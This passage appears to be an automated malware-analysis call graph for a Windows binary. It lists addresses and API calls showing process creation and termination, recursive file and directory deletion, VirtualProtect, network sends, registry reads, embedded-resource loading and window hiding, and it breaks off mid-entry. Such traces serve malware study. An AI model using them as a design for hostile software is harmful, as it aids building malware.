API calls __cftof 67815->67854 67820 100097e7 67819->67820 67822 100097f5 ___scrt_fastfail 67819->67822 67820->67822 67825 10009900 28 API calls std::_Xinvalid_argument 67820->67825 67822->67751 67823->67770 67824->67762 67825->67822 67826->67806 67827->67807 67829 10004493 67828->67829 67830 100044f7 67829->67830 67832 100044d7 67829->67832 67837 100044cc 67829->67837 67833 1000a5f3 new 22 API calls 67830->67833 67831 100044e3 67835 1000a5f3 new 22 API calls 67831->67835 67832->67831 67846 1000ade3 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 67832->67846 67833->67837 67835->67837 67836 10004568 67839 10004574 67836->67839 67848 1000daab 26 API calls __cftof 67836->67848 67837->67836 67840 1000458a 67837->67840 67847 1000daab 26 API calls __cftof 67837->67847 67842 10004580 67839->67842 67849 1000daab 26 API calls __cftof 67839->67849 67840->67800 67842->67840 67850 1000daab 26 API calls __cftof 67842->67850 70409 4260a1 70414 42611e send 70409->70414 70415 425e66 70416 425e7b 70415->70416 70419 425f1b 70415->70419 70417 425f35 70416->70417 70418 425f6a 70416->70418 70416->70419 70420 425ec9 70416->70420 70421 425f87 70416->70421 70422 425fae 70416->70422 70427 425efe 70416->70427 70443 424364 48 API calls ctype 70416->70443 70417->70418 70417->70419 70446 41f085 52 API calls 70417->70446 70418->70421 70447 424b8b 21 API calls 70418->70447 70420->70419 70420->70427 70444 41f085 52 API calls 70420->70444 70421->70419 70421->70422 70431 424f88 70421->70431 70422->70419 70448 4255d7 28 API calls 70422->70448 70427->70417 70427->70419 70445 424364 48 API calls ctype 70427->70445 70432 424fa7 ___scrt_fastfail 70431->70432 70434 424fb6 70432->70434 70438 424fdb 70432->70438 70449 41e0a7 21 API calls 70432->70449 70434->70438 70442 424fbb 70434->70442 70450 41fae4 45 API calls 70434->70450 70437 424fc4 70437->70438 70452 424195 21 API calls 2 library calls 70437->70452 70438->70422 70440 42505e 70440->70438 70441 431fa9 21 API calls 70440->70441 70441->70442 70442->70437 70442->70438 70451 41cf7e 48 API calls 70442->70451 70443->70420 70444->70420 70445->70417 70446->70417 70447->70421 70448->70419 70449->70434 70450->70440 70451->70437 70452->70438 70453 10015a65 70454 10015a70 RtlFreeHeap 70453->70454 70458 10015a99 _free 70453->70458 70455 10015a85 70454->70455 70454->70458 70459 100160ec 20 API calls __dosmaperr 70455->70459 70457 10015a8b GetLastError 70457->70458 70459->70457 70460 283c7a7 70461 283c7be 70460->70461 70465 283c81c 70460->70465 70461->70465 70471 283c7e6 GetModuleHandleA 70461->70471 70463 283c872 70464 283c835 GetModuleHandleA 70466 283c83f 70464->70466 70465->70463 70465->70464 70465->70466 70466->70465 70467 283c85f GetProcAddress 70466->70467 70467->70465 70472 283c7ef 70471->70472 70479 283c81c 70471->70479 70482 283c803 GetProcAddress 70472->70482 70474 283c872 70475 283c835 GetModuleHandleA 70480 283c83f 70475->70480 70479->70474 70479->70475 70479->70480 70480->70479 70481 283c85f GetProcAddress 70480->70481 70481->70479 70483 283c81c 70482->70483 70484 283c80d VirtualProtect 70482->70484 70485 283c872 70483->70485 70486 283c835 GetModuleHandleA 70483->70486 70484->70483 70488 283c83f 70486->70488 70487 283c85f GetProcAddress 70487->70488 70488->70483 70488->70487 70489 1000ac67 70490 1000ac73 ___DestructExceptionObject 70489->70490 70491 1000ac9c dllmain_raw 70490->70491 70493 1000ac97 70490->70493 70494 1000ac82 ___DestructExceptionObject 70490->70494 70492 1000acb6 dllmain_crt_dispatch 70491->70492 70491->70494 70492->70493 70492->70494 70502 10006e40 70493->70502 70497 1000ad03 70497->70494 70498 1000ad0c dllmain_crt_dispatch 70497->70498 70498->70494 70500 1000ad1f dllmain_raw 70498->70500 70499 10006e40 12 API calls 70501 1000acef dllmain_crt_dispatch dllmain_raw 70499->70501 70500->70494 70501->70497 70503 10006e49 70502->70503 70504 10006e4e 70502->70504 70506 10007240 12 API calls 70503->70506 70504->70497 70504->70499 70507 100072d7 70506->70507 70507->70504 67855 100012cb 67856 10004160 28 API calls 67855->67856 67857 100012d5 67856->67857 68013 10005f20 67857->68013 67860 10001315 67861 10001354 67860->67861 67862 10004160 28 API calls 67860->67862 68024 10006020 67861->68024 67862->67861 67864 10004160 28 API calls 67864->67860 67866 10001380 67867 100013bf 67866->67867 67870 10004160 28 API calls 67866->67870 68035 10006120 67867->68035 67869 10004160 28 API calls 67869->67866 67870->67867 67872 100013e8 67873 10001421 67872->67873 67875 10004160 28 API calls 67872->67875 68046 10005c00 67873->68046 67874 10004160 28 API calls 67874->67872 67875->67873 67878 10003a70 28 API calls 67879 10001471 67878->67879 67880 100067d0 31 API calls 67879->67880 67881 1000147c 67880->67881 67882 10003a70 28 API calls 67881->67882 67883 100014be 67882->67883 67884 100067d0 31 API calls 67883->67884 67885 100014c9 67884->67885 67886 10003a70 28 API calls 67885->67886 67887 1000150b 67886->67887 67888 100067d0 31 API calls 67887->67888 67889 10001516 67888->67889 68081 10007a40 CreateFileW 67889->68081 67891 10001539 67892 10003a70 28 API calls 67891->67892 67893 10001577 67892->67893 67894 10003a70 28 API calls 67893->67894 67906 100015bc 67894->67906 67897 100017ea 67899 1000180b Sleep 67897->67899 67919 10001815 67897->67919 68131 10007e20 67897->68131 67898 10003a70 28 API calls 67898->67906 67899->67897 67899->67919 67901 10003a70 28 API calls 67901->67919 67903 10004160 28 API calls 67903->67906 67904 10004c10 28 API calls 67904->67906 67906->67897 67906->67898 67906->67903 67906->67904 67906->67919 68090 10006220 67906->68090 68109 100025a0 67906->68109 68167 10003ff0 28 API calls std::_Xinvalid_argument 67906->68167 67907 10007e20 9 API calls 67908 10001adb 67907->67908 67908->67907 67910 10001b05 67908->67910 67911 10001afb Sleep 67908->67911 67913 10003a70 28 API calls 67910->67913 67911->67908 67911->67910 67914 10001b46 67913->67914 67916 10003a70 28 API calls 67914->67916 67915 100025a0 43 API calls 67915->67919 67920 10001b8b 67916->67920 67917 10004160 28 API calls 67917->67919 67918 10004c10 28 API calls 67918->67919 67919->67901 67919->67908 67919->67915 67919->67917 67919->67918 68143 100063b0 67919->68143 68168 1000daab 26 API calls __cftof 67919->68168 68169 1000a5c6 28 API calls 2 library calls 67919->68169 68170 10003ff0 28 API calls std::_Xinvalid_argument 67919->68170 67922 10001c5c 67920->67922 67945 10001bb1 67920->67945 68154 10007de0 67922->68154 67931 10001c9c 68178 10004be0 28 API calls 67931->68178 67933 100025a0 43 API calls 67933->67945 67934 10001cb5 68179 10004be0 28 API calls 67934->68179 67937 10001cd0 68180 10004be0 28 API calls 67937->68180 67939 10001ce9 68181 10004be0 28 API calls 67939->68181 67942 10001d04 68182 10004be0 28 API calls 67942->68182 67943 10004c10 28 API calls 67943->67945 67945->67922 67945->67933 67945->67943 67950 100036c0 26 API calls 67945->67950 68171 100033e0 28 API calls 67945->68171 68172 10003500 28 API calls 67945->68172 68173 100064b0 36 API calls 67945->68173 68174 10003730 26 API calls 67945->68174 68175 10003460 28 API calls 67945->68175 68176 100036a0 28 API calls 67945->68176 67946 10001d1d 68183 10004be0 28 API calls 67946->68183 67949 10001d38 68184 10004be0 28 API calls 67949->68184 67950->67945 67952 10001d51 68185 10004be0 28 API calls 67952->68185 67954 10001d69 68186 10004be0 28 API calls 67954->68186 67956 10001d7f 68187 10004be0 28 API calls 67956->68187 67958 10001d9a 67959 100036c0 26 API calls 67958->67959 67960 10001da5 67959->67960 67961 100036c0 26 API calls 67960->67961 67962 10001dad 67961->67962 67963 100036c0 26 API calls 67962->67963 67964 10001db8 67963->67964 67965 100036c0 26 API calls 67964->67965 67966 10001dc3 67965->67966 67967 100036c0 26 API calls 67966->67967 67968 10001dce 67967->67968 67969 100036c0 26 API calls 67968->67969 67970 10001dd9 67969->67970 67971 100036c0 26 API calls 67970->67971 67972 10001de4 67971->67972 67973 100036c0 26 API calls 67972->67973 67974 10001def 67973->67974 67975 100036c0 26 API calls 67974->67975 67976 10001dfa 67975->67976 67977 100036c0 26 API calls 67976->67977 67978 10001e05 67977->67978 67979 100036c0 26 API calls 67978->67979 67980 10001e10 67979->67980 68188 100038d0 28 API calls 67980->68188 67982 10001e1b 68189 100038d0 28 API calls 67982->68189 67984 10001e26 68190 100038d0 28 API calls 67984->68190 67986 10001e31 68191 10003460 28 API calls 67986->68191 67988 10001e3c 68192 10003460 28 API calls 67988->68192 67990 10001e44 68193 10003460 28 API calls 67990->68193 67992 10001e4f 68194 10003460 28 API calls 67992->68194 67994 10001e5a 68195 10003460 28 API calls 67994->68195 67996 10001e65 67997 100036c0 26 API calls 67996->67997 67998 10001e70 67997->67998 67999 100036c0 26 API calls 67998->67999 68000 10001e7b 67999->68000 68001 100036c0 26 API calls 68000->68001 68002 10001e86 68001->68002 68003 100036c0 26 API calls 68002->68003 68004 10001e8e 68003->68004 68005 100036c0 26 API calls 68004->68005 68006 10001e99 68005->68006 68007 100036c0 26 API calls 68006->68007 68008 10001ea4 68007->68008 68009 100036c0 26 API calls 68008->68009 68010 10001eaf 68009->68010 68011 100036c0 26 API calls 68010->68011 68012 10001eba 68011->68012 68014 10005f53 68013->68014 68015 10003970 28 API calls 68014->68015 68016 10005f99 68015->68016 68017 10004330 28 API calls 68016->68017 68018 10005faf PathFileExistsW 68017->68018 68019 10005fd2 68018->68019 68021 10005fc7 68018->68021 68020 10003970 28 API calls 68019->68020 68020->68021 68022 100012f1 68021->68022 68023 10004160 28 API calls 68021->68023 68022->67860 68022->67864 68023->68022 68025 10006053 68024->68025 68026 10003970 28 API calls 68025->68026 68027 10006099 68026->68027 68028 10004330 28 API calls 68027->68028 68029 100060af PathFileExistsW 68028->68029 68030 100060d2 68029->68030 68032 100060c7 68029->68032 68031 10003970 28 API calls 68030->68031 68031->68032 68033 1000135c 68032->68033 68034 10004160 28 API calls 68032->68034 68033->67866 68033->67869 68034->68033 68036 10006153 68035->68036 68037 10003970 28 API calls 68036->68037 68038 10006199 68037->68038 68039 10004330 28 API calls 68038->68039 68040 100061af PathFileExistsW 68039->68040 68041 100061d2 68040->68041 68043 100061c7 68040->68043 68042 10003970 28 API calls 68041->68042 68042->68043 68044 100013c7 68043->68044 68045 10004160 28 API calls 68043->68045 68044->67872 68044->67874 68045->68044 68047 10005c37 68046->68047 68047->68047 68048 10003970 28 API calls 68047->68048 68049 10005c79 68048->68049 68050 10004330 28 API calls 68049->68050 68051 10005c8f 68050->68051 68052 10004d80 28 API calls 68051->68052 68053 10005c9f FindFirstFileW 68052->68053 68055 10005cc2 68053->68055 68056 10005ccc 68053->68056 68057 10004160 28 API calls 68055->68057 68058 10005d04 FindNextFileW 68056->68058 68059 10005ce5 68056->68059 68057->68056 68060 10005e96 FindClose 68058->68060 68071 10005d36 68058->68071 68061 10003970 28 API calls 68059->68061 68063 100034a0 28 API calls 68060->68063 68062 10005cff 68061->68062 68066 1000142c 68062->68066 68067 10004160 28 API calls 68062->68067 68079 10005ea9 68063->68079 68064 10005e84 FindNextFileW 68064->68060 68064->68071 68065 100036c0 26 API calls 68065->68062 68066->67878 68067->68066 68068 10003970 28 API calls 68068->68071 68069 10004d80 28 API calls 68069->68071 68070 10006d90 28 API calls 68070->68071 68071->68064 68071->68068 68071->68069 68071->68070 68072 10004160 28 API calls 68071->68072 68073 10005e5c PathFileExistsW 68071->68073 68075 10004160 28 API calls 68071->68075 68076 10005e7a 68071->68076 68072->68071 68073->68071 68074 10005ed9 FindClose 68073->68074 68077 10005eeb 68074->68077 68075->68073 68078 10004160 28 API calls 68076->68078 68077->68079 68080 10004160 28 API calls 68077->68080 68078->68064 68079->68065 68080->68079 68082 10007a68 GetFileSize 68081->68082 68083 10007aca 68081->68083 68084 10007a94 68082->68084 68086 10007a7b ReadFile 68082->68086 68083->67891 68196 10008280 68084->68196 68088 10007ad2 CloseHandle 68086->68088 68089 10007ac4 CloseHandle 68086->68089 68088->67891 68089->68083 68091 10006253 68090->68091 68092 10003970 28 API calls 68091->68092 68093 10006299 68092->68093 68094 10003a70 28 API calls 68093->68094 68095 100062d0 68094->68095 68208 10007ae0 68095->68208 68098 10006300 68099 10006333 68098->68099 68101 10004160 28 API calls 68098->68101 68102 10004330 28 API calls 68099->68102 68100 10004160 28 API calls 68100->68098 68101->68099 68103 10006342 PathFileExistsW 68102->68103 68104 10006365 68103->68104 68106 1000635a 68103->68106 68105 10003970 28 API calls 68104->68105 68105->68106 68107 10006395 68106->68107 68108 10004160 28 API calls 68106->68108 68107->67906 68108->68107 68110 100025e4 ___scrt_fastfail 68109->68110 68221 10004ab0 68110->68221 68114 1000274a 68231 10004e80 68114->68231 68116 10002762 68117 10004cc0 28 API calls 68116->68117 68118 10002778 CreateProcessW 68117->68118 68120 100027bc 68118->68120 68234 10002b20 68120->68234 68123 10002a98 TerminateProcess WaitForSingleObject CloseHandle CloseHandle 68124 10002acc 68123->68124 68127 100036c0 26 API calls 68124->68127 68126 1000296f 68128 10003860 28 API calls 68126->68128 68129 10002ad7 68127->68129 68130 10002983 68128->68130 68129->67906 68130->68123 68132 10007e40 68131->68132 68132->68132 68133 10007ebc FindFirstFileW 68132->68133 68134 10008092 68133->68134 68139 10007ee2 68133->68139 68134->67897 68135 10007f02 FindNextFileW 68136 1000806d GetLastError 68135->68136 68135->68139 68137 10008078 FindClose RemoveDirectoryW 68136->68137 68138 1000808b FindClose 68136->68138 68137->67897 68138->68134 68139->68135 68139->68138 68140 10008021 SetFileAttributesW 68139->68140 68141 10008033 DeleteFileW 68139->68141 68142 10007fed RemoveDirectoryW 68139->68142 68140->68141 68141->68138 68141->68139 68142->68139 68144 100063e3 68143->68144 68145 10003970 28 API calls 68144->68145 68146 10006429 68145->68146 68147 10004330 28 API calls 68146->68147 68148 1000643f PathFileExistsW 68147->68148 68149 10006462 68148->68149 68151 10006457 68148->68151 68150 10003970 28 API calls 68149->68150 68150->68151 68152 10006492 68151->68152 68153 10004160 28 API calls 68151->68153 68152->67919 68153->68152 68155 10007df4 68154->68155 68156 10007e20 9 API calls 68155->68156 68157 10007e01 Sleep 68155->68157 68158 10001c6b 68155->68158 68156->68155 68157->68155 68157->68158 68159 10004c10 68158->68159 68160 10004c5e 68159->68160 68278 100050b0 68160->68278 68164 10004c92 68290 10003ff0 28 API calls std::_Xinvalid_argument 68164->68290 68166 10001c81 68177 10004be0 28 API calls 68166->68177 68167->67906 68169->67919 68170->67919 68171->67945 68172->67945 68173->67945 68174->67945 68175->67945 68176->67945 68177->67931 68178->67934 68179->67937 68180->67939 68181->67942 68182->67946 68183->67949 68184->67952 68185->67954 68186->67956 68187->67958 68188->67982 68189->67984 68190->67986 68191->67988 68192->67990 68193->67992 68194->67994 68195->67996 68197 10008352 68196->68197 68198 1000829a 68196->68198 68206 1000a5a6 28 API calls 2 library calls 68197->68206 68200 1000835c 68198->68200 68201 100082ae 68198->68201 68202 100082bc ___scrt_fastfail 68198->68202 68207 1000a5a6 28 API calls 2 library calls 68200->68207 68201->68202 68204 10004460 28 API calls 68201->68204 68202->68086 68204->68202 68210 10007b1b 68208->68210 68209 10007bef 68212 100062e2 68209->68212 68214 10004160 28 API calls 68209->68214 68210->68209 68211 10003970 28 API calls 68210->68211 68213 10007b89 68211->68213 68212->68098 68212->68100 68220 10005130 28 API calls 2 library calls 68213->68220 68214->68212 68216 10007bbf 68217 10003a70 28 API calls 68216->68217 68218 10007bdd 68217->68218 68218->68209 68219 10004160 28 API calls 68218->68219 68219->68209 68220->68216 68225 10004afc 68221->68225 68222 10004330 28 API calls 68223 10004b57 68222->68223 68224 10004890 28 API calls 68223->68224 68226 10002734 68224->68226 68225->68222 68227 10004cc0 68226->68227 68228 10004ce0 68227->68228 68228->68228 68229 10004330 28 API calls 68228->68229 68230 10004d08 ___BuildCatchObject 68229->68230 68230->68114 68232 10004890 28 API calls 68231->68232 68233 10004ea2 ___BuildCatchObject 68232->68233 68233->68116 68235 10002b42 68234->68235 68268 10007310 LoadLibraryW 68235->68268 68237 10002b6f 68238 10002b75 68237->68238 68244 10002b96 68237->68244 68239 10003dc0 28 API calls 68238->68239 68243 10002b91 68239->68243 68240 100036c0 26 API calls 68241 10002951 68240->68241 68241->68123 68261 10003860 68241->68261 68242 10002bf2 GetLastError 68242->68243 68243->68240 68244->68242 68250 10002c15 68244->68250 68245 10002cd2 68273 10002db0 28 API calls 68245->68273 68246 10002d5b 68248 100036c0 26 API calls 68246->68248 68248->68243 68249 100036c0 26 API calls 68249->68246 68250->68245 68250->68246 68272 10003570 28 API calls std::_Xinvalid_argument 68250->68272 68251 10002cdd 68252 10002d29 68251->68252 68253 10002d07 68251->68253 68274 1000daab 26 API calls __cftof 68251->68274 68252->68249 68256 10002d13 68253->68256 68275 1000daab 26 API calls __cftof 68253->68275 68258 10002d1f 68256->68258 68276 1000daab 26 API calls __cftof 68256->68276 68258->68252 68277 1000daab 26 API calls __cftof 68258->68277 68262 1000387f 68261->68262 68265 10003891 68261->68265 68263 10003dc0 28 API calls 68262->68263 68264 1000388a 68263->68264 68264->68126 68266 10003dc0 28 API calls 68265->68266 68267 100038aa 68266->68267 68267->68126 68269 10007326 8 API calls 68268->68269 68270 100073dd 68268->68270 68269->68270 68271 1000739f 68269->68271 68270->68237 68271->68237 68271->68270 68272->68250 68273->68251 68279 100050c2 68278->68279 68288 10004c86 68278->68288 68280 10005121 68279->68280 68281 100050ce 68279->68281 68279->68288 68292 1000a5a6 28 API calls 2 library calls 68280->68292 68283 100050d2 68281->68283 68284 100050f3 68281->68284 68286 10004460 28 API calls 68283->68286 68284->68288 68291 10003c00 26 API calls 68284->68291 68286->68288 68289 10003ff0 28 API calls std::_Xinvalid_argument 68288->68289 68289->68164 68290->68166 68291->68288 70508 43a9a8 70511 43a9b4 _swprintf CallCatchBlock 70508->70511 70509 43a9c2 70524 445364 20 API calls _abort 70509->70524 70511->70509 70512 43a9ec 70511->70512 70519 444adc EnterCriticalSection 70512->70519 70514 43a9f7 70520 43aa98 70514->70520 70516 43a9c7 __fread_nolock ___std_exception_copy 70519->70514 70522 43aaa6 70520->70522 70521 43aa02 70525 43aa1f LeaveCriticalSection std::_Lockit::~_Lockit 70521->70525 70522->70521 70526 448426 36 API calls 2 library calls 70522->70526 70524->70516 70525->70516 70526->70522 70527 428da9 70532 428d2c 70527->70532 70529 428dbd _memcmp 70531 428df5 70529->70531 70540 428367 21 API calls ctype 70529->70540 70533 428d9d 70532->70533 70534 428d37 70532->70534 70533->70529 70534->70533 70541 4284bc 21 API calls ctype 70534->70541 70536 428d78 70536->70533 70542 428cbd 70536->70542 70540->70531 70541->70536 70543 428ce4 70542->70543 70544 428cea 70543->70544 70549 428bf9 70543->70549 70548 4284bc 21 API calls ctype 70544->70548 70547 428bf9 22 API calls 70547->70544 70548->70533 70551 428c1e ctype ___scrt_fastfail 70549->70551 70550 428ca2 70550->70547 70551->70550 70553 428a9e 70551->70553 70558 41a46a 70553->70558 70556 428abb 70557 428aed 70556->70557 70561 427655 70556->70561 70557->70550 70559 4395ca 21 API calls 70558->70559 70560 41a471 70559->70560 70560->70556 70564 441cc0 70561->70564 70569 441c82 21 API calls 4 library calls 70564->70569 70566 441ccb 70568 42765b 70566->70568 70570 441a91 20 API calls 3 library calls 70566->70570 70568->70557 70569->70566 70570->70568 68293 402bcc 68294 402bd7 68293->68294 68295 402bdf 68293->68295 68301 403315 68294->68301 68296 402beb 68295->68296 68308 4015d3 68295->68308 68302 4015d3 22 API calls 68301->68302 68303 40332a 68302->68303 68304 402bdd 68303->68304 68305 40333b 68303->68305 68318 43a864 11 API calls _abort 68305->68318 68307 43a863 68310 43361d 68308->68310 68311 402be9 68310->68311 68314 43363e std::_Facet_Register 68310->68314 68319 43a89c 68310->68319 68326 442210 7 API calls 2 library calls 68310->68326 68313 433dfc std::_Facet_Register 68328 437be7 RaiseException 68313->68328 68314->68313 68327 437be7 RaiseException 68314->68327 68317 433e19 68318->68307 68325 446b0f _strftime 68319->68325 68320 446b4d 68330 445364 20 API calls _abort 68320->68330 68321 446b38 RtlAllocateHeap 68323 446b4b 68321->68323 68321->68325 68323->68310 68325->68320 68325->68321 68329 442210 7 API calls 2 library calls 68325->68329 68326->68310 68327->68313 68328->68317 68329->68325 68330->68323 70571 42ea2e 70572 42ea39 70571->70572 70573 42ea4d 70572->70573 70575 431fd3 70572->70575 70576 431fe2 70575->70576 70578 431fde 70575->70578 70579 43fcea 70576->70579 70578->70573 70580 44b9ce 70579->70580 70581 44b9e6 70580->70581 70582 44b9db 70580->70582 70584 44b9ee 70581->70584 70591 44b9f7 _strftime 70581->70591 70592 446b0f 70582->70592 70585 446ad5 _free 20 API calls 70584->70585 70588 44b9e3 70585->70588 70586 44ba21 RtlReAllocateHeap 70586->70588 70586->70591 70587 44b9fc 70599 445364 20 API calls _abort 70587->70599 70588->70578 70591->70586 70591->70587 70600 442210 7 API calls 2 library calls 70591->70600 70593 446b4d 70592->70593 70594 446b1d _strftime 70592->70594 70602 445364 20 API calls _abort 70593->70602 70594->70593 70595 446b38 RtlAllocateHeap 70594->70595 70601 442210 7 API calls 2 library calls 70594->70601 70595->70594 70597 446b4b 70595->70597 70597->70588 70599->70588 70600->70591 70601->70594 70602->70597 68331 4339ce 68332 4339da CallCatchBlock 68331->68332 68363 4336c3 68332->68363 68334 4339e1 68335 433b34 68334->68335 68338 433a0b 68334->68338 68663 433b54 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 68335->68663 68337 433b3b 68664 4426ce 28 API calls _abort 68337->68664 68348 433a4a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 68338->68348 68657 4434e1 5 API calls CatchGuardHandler 68338->68657 68340 433b41 68665 442680 28 API calls _abort 68340->68665 68343 433a24 68345 433a2a 68343->68345 68658 443485 5 API calls CatchGuardHandler 68343->68658 68344 433b49 68353 433aab 68348->68353 68659 43ee04 35 API calls 2 library calls 68348->68659 68374 433c6e 68353->68374 68364 4336cc 68363->68364 68666 433e1a IsProcessorFeaturePresent 68364->68666 68366 4336d8 68667 4379fe 10 API calls 3 library calls 68366->68667 68368 4336dd 68373 4336e1 68368->68373 68668 44336e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 68368->68668 68370 4336ea 68371 4336f8 68370->68371 68669 437a27 8 API calls 3 library calls 68370->68669 68371->68334 68373->68334 68670 436060 68374->68670 68377 433ab1 68378 443432 68377->68378 68672 44ddd9 68378->68672 68380 433aba 68383 40d767 68380->68383 68381 44343b 68381->68380 68676 44e0e3 35 API calls 68381->68676 68678 41bcf3 LoadLibraryA GetProcAddress 68383->68678 68385 40d783 GetModuleFileNameW 68683 40e168 68385->68683 68387 40d79f 68698 401fbd 68387->68698 68390 401fbd 28 API calls 68391 40d7bd 68390->68391 68702 41afd3 68391->68702 68395 40d7cf 68727 401d8c 68395->68727 68397 40d7d8 68398 40d835 68397->68398 68399 40d7eb 68397->68399 68733 401d64 68398->68733 68981 40e986 111 API calls 68399->68981 68402 40d7fd 68404 401d64 28 API calls 68402->68404 68403 40d845 68405 401d64 28 API calls 68403->68405 68408 40d809 68404->68408 68406 40d864 68405->68406 68738 404cbf 68406->68738 68982 40e937 65 API calls 68408->68982 68409 40d873 68742 405ce6 68409->68742 68412 40d87f 68745 401eef 68412->68745 68413 40d824 68983 40e155 65 API calls 68413->68983 68416 40d88b 68749 401eea 68416->68749 68418 40d894 68420 401eea 11 API calls 68418->68420 68422 40d89d 68420->68422 68423 401d64 28 API calls 68422->68423 68424 40d8a6 68423->68424 68753 401ebd 68424->68753 68426 40d8b1 68427 401d64 28 API calls 68426->68427 68428 40d8ca 68427->68428 68429 401d64 28 API calls 68428->68429 68431 40d8e5 68429->68431 68430 40d946 68432 401d64 28 API calls 68430->68432 68447 40e134 68430->68447 68431->68430 68984 4085b4 68431->68984 68438 40d95d 68432->68438 68434 40d912 68435 401eef 11 API calls 68434->68435 68436 40d91e 68435->68436 68439 401eea 11 API calls 68436->68439 68437 40d9a4 68757 40bed7 68437->68757 68438->68437 68444 4124b7 3 API calls 68438->68444 68440 40d927 68439->68440 68988 4124b7 RegOpenKeyExA 68440->68988 68449 40d988 68444->68449 69076 412902 30 API calls 68447->69076 68449->68437 68991 412902 30 API calls 68449->68991 68457 40e14a 69077 4112b5 64 API calls ___scrt_fastfail 68457->69077 68657->68343 68658->68348 68659->68353 68663->68337 68664->68340 68665->68344 68666->68366 68667->68368 68668->68370 68669->68373 68671 433c81 GetStartupInfoW 68670->68671 68671->68377 68673 44ddeb 68672->68673 68674 44dde2 68672->68674 68673->68381 68677 44dcd8 48 API calls 4 library calls 68674->68677 68676->68381 68677->68673 68679 41bd32 LoadLibraryA GetProcAddress 68678->68679 68680 41bd22 GetModuleHandleA GetProcAddress 68678->68680 68681 41bd5b 32 API calls 68679->68681 68682 41bd4b LoadLibraryA GetProcAddress 68679->68682 68680->68679 68681->68385 68682->68681 69078 41a64f FindResourceA 68683->69078 68686 43a89c ___std_exception_copy 21 API calls 68687 40e192 ctype 68686->68687 69081 401f86 68687->69081 68690 401eef 11 API calls 68691 40e1b8 68690->68691 68692 401eea 11 API calls 68691->68692 68693 40e1c1 68692->68693 68694 43a89c ___std_exception_copy 21 API calls 68693->68694 68695 40e1d2 ctype 68694->68695 69085 406052 68695->69085 68697 40e205 68697->68387 68699 401fcc 68698->68699 69093 402501 68699->69093 68701 401fea 68701->68390 68722 41afe6 68702->68722 68703 41b056 68704 401eea 11 API calls 68703->68704 68705 41b088 68704->68705 68706 401eea 11 API calls 68705->68706 68708 41b090 68706->68708 68707 41b058 68709 403b60 28 API calls 68707->68709 68711 401eea 11 API calls 68708->68711 68712 41b064 68709->68712 68713 40d7c6 68711->68713 68714 401eef 11 API calls 68712->68714 68723 40e8bd 68713->68723 68716 41b06d 68714->68716 68715 401eef 11 API calls 68715->68722 68717 401eea 11 API calls 68716->68717 68719 41b075 68717->68719 68718 401eea 11 API calls 68718->68722 69102 41bfb9 28 API calls 68719->69102 68722->68703 68722->68707 68722->68715 68722->68718 69098 403b60 68722->69098 69101 41bfb9 28 API calls 68722->69101 68724 40e8ca 68723->68724 68726 40e8da 68724->68726 69119 40200a 11 API calls 68724->69119 68726->68395 68728 40200a 68727->68728 68729 40203a 68728->68729 69120 402654 68728->69120 68729->68397 68731 40202b 69123 4026ba 11 API calls _Deallocate 68731->69123 68734 401d6c 68733->68734 68735 401d74 68734->68735 69137 401fff 28 API calls 68734->69137 68735->68403 68737 401d8b 68739 404ccb 68738->68739 69138 402e78 68739->69138 68741 404cee 68741->68409 69147 404bc4 68742->69147 68744 405cf4 68744->68412 68746 401efe 68745->68746 68748 401f0a 68746->68748 69156 4021b9 68746->69156 68748->68416 68750 4021b9 68749->68750 68751 4021e8 68750->68751 68752 40262e 11 API calls 68750->68752 68751->68418 68752->68751 68755 401ec9 68753->68755 68754 401ee4 68754->68426 68755->68754 68756 402325 28 API calls 68755->68756 68756->68754 69168 401e8f 68757->69168 68981->68402 68982->68413 68985 4085c0 68984->68985 68986 402e78 28 API calls 68985->68986 68987 4085e4 68986->68987 68987->68434 68989 4124e1 RegQueryValueExA RegCloseKey 68988->68989 68990 41250b 68988->68990 68989->68990 68990->68430 68991->68437 69076->68457 69079 40e183 69078->69079 69080 41a66c LoadResource LockResource SizeofResource 69078->69080 69079->68686 69080->69079 69082 401f8e 69081->69082 69088 402325 69082->69088 69084 401fa4 69084->68690 69086 401f86 28 API calls 69085->69086 69087 406066 69086->69087 69087->68697 69089 40232f 69088->69089 69091 40233a 69089->69091 69092 40294a 28 API calls 69089->69092 69091->69084 69092->69091 69095 40250d 69093->69095 69094 40252b 69094->68701 69095->69094 69097 40261a 28 API calls 69095->69097 69097->69094 69103 403c30 69098->69103 69101->68722 69102->68703 69104 403c39 69103->69104 69107 403c59 69104->69107 69108 403c68 69107->69108 69113 4032a4 69108->69113 69110 403c74 69111 402325 28 API calls 69110->69111 69112 403b73 69111->69112 69112->68722 69114 4032b0 69113->69114 69115 4032ad 69113->69115 69118 4032b6 22 API calls 69114->69118 69115->69110 69119->68726 69124 402c1a 69120->69124 69123->68729 69127 403340 69124->69127 69129 403348 69127->69129 69128 402662 69128->68731 69129->69128 69131 4038c2 69129->69131 69134 4038cb 69131->69134 69135 401eea 11 API calls 69134->69135 69136 4038ca 69135->69136 69136->69129 69137->68737 69139 402e85 69138->69139 69140 402e98 69139->69140 69142 402ea9 69139->69142 69143 402eae 69139->69143 69145 403445 28 API calls 69140->69145 69142->68741 69143->69142 69146 40225b 11 API calls 69143->69146 69145->69142 69146->69142 69148 404bd0 69147->69148 69151 40245c 69148->69151 69150 404be4 69150->68744 69152 402469 69151->69152 69154 402478 69152->69154 69155 402ad3 28 API calls 69152->69155 69154->69150 69155->69154 69157 4021c6 69156->69157 69158 4021e8 69157->69158 69160 40262e 69157->69160 69158->68748 69163 402bee 69160->69163 69162 40263b 69162->69158 69164 402bfb 69163->69164 69165 402c08 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 69163->69165 69167 4015d8 11 API calls __Getctype 69164->69167 69165->69162 69167->69165 69169 401e94 69168->69169 70113 10007890 CreateToolhelp32Snapshot 70114 100078e2 70113->70114 70115 100078bf Process32FirstW 70113->70115 70116 100078db CloseHandle 70115->70116 70118 100078f0 70115->70118 70116->70114 70117 10003970 28 API calls 70117->70118 70118->70117 70119 10004160 28 API calls 70118->70119 70120 10007a10 Process32NextW 70118->70120 70121 100079d1 FindWindowExA GetWindowThreadProcessId 70118->70121 70119->70118 70120->70118 70122 10007a2c CloseHandle 70120->70122 70121->70118 70123 100079f7 ShowWindow 70121->70123 70123->70118 70124 10009293 70125 10009299 70124->70125 70166 10008550 70125->70166 70128 10003dc0 28 API calls 70130 